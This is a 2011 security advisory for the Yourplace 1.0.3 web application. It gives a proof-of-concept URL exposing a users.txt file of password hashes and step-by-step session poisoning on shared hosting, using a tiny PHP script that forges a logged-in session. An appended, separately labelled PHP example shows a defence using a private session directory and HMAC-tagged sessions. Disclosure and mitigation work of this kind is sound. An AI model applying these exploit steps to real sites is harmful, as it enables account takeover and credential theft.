Yourplace 1.0.3 Credentials Disclosure && Session Poisoning Vulnerabilities
by condis
04.10.2011
download : http://sourceforge.net/projects/yourplace/
1. Credentials Disclosure Vulnerability
Proof of Concept:
http://host.tld/user/info/users.txt
You'll see something like:
admin $1$DG3.QA2.$6WzBBJvwvtqzUBxZcD.dC1
Description:
There is no .htaccess rule which could deny access to users.txt.
Also it's pure stupidity to put sensitive data into txt files...
The user's password is hashed with the crypt() function, where the
input is the user-defined password and the salt is the user's login.
2. Session Poisoning Vulnerability
To exploit this vulnerability you must have an account on the same server as
the attacked application, for example under another domain (shared hosting).
1. Visit site you want to attack.
2. Create simple script:
<?php
session_start();
$_SESSION['username'] = true;
?>
Save it on your account and execute it via the browser.
3. Refresh the browser tab with the attacked site.
4. You're logged in ... nice and easy, lulz...
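
A defensive counterpart to the session poisoning steps above, added here as an example and not taken from Yourplace: the application keeps its sessions in its own directory and accepts a login only when the session holds a string username with a valid HMAC tag, so a session written by a co-hosted script (such as $_SESSION['username'] = true) is rejected. The directory, cookie name, key file and function names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example: every name and path below is hypothetical, not Yourplace code.
const APP_SESSION_DIR  = __DIR__ . '/../private/sessions';    // assumed: outside the web root, mode 0700
const APP_SESSION_NAME = 'APPSESSID';                          // assumed: app-specific cookie name
const APP_KEY_FILE     = __DIR__ . '/../private/session.key'; // assumed: 32+ random bytes, not web-readable

function app_key(): string
{
    $key = @file_get_contents(APP_KEY_FILE);
    if ($key === false || strlen($key) < 32) {
        throw new RuntimeException('session key missing or too short');
    }
    return $key;
}

function start_app_session(): void
{
    // Do not use the host-wide default session directory shared with other sites.
    session_save_path(APP_SESSION_DIR);
    // Reject session ids that have no session data in APP_SESSION_DIR.
    ini_set('session.use_strict_mode', '1');
    session_name(APP_SESSION_NAME);
    session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
    session_start();
}

// Call only after the password check has succeeded.
function mark_logged_in(string $username): void
{
    session_regenerate_id(true); // issue a fresh id after authentication
    $_SESSION['username'] = $username;
    $_SESSION['auth_tag'] = hash_hmac('sha256', $username, app_key());
}

// Returns the authenticated username, or null for missing or forged session data.
function current_user(): ?string
{
    $user = $_SESSION['username'] ?? null;
    $tag  = $_SESSION['auth_tag'] ?? null;
    // A truthy non-string value such as `true` is not accepted as a login.
    if (!is_string($user) || $user === '' || !is_string($tag)) {
        return null;
    }
    $expected = hash_hmac('sha256', $user, app_key());
    return hash_equals($expected, $tag) ? $user : null;
}
```

The tag only helps while co-hosted accounts cannot read the key file, so per-account file permissions or open_basedir restrictions on the host still matter.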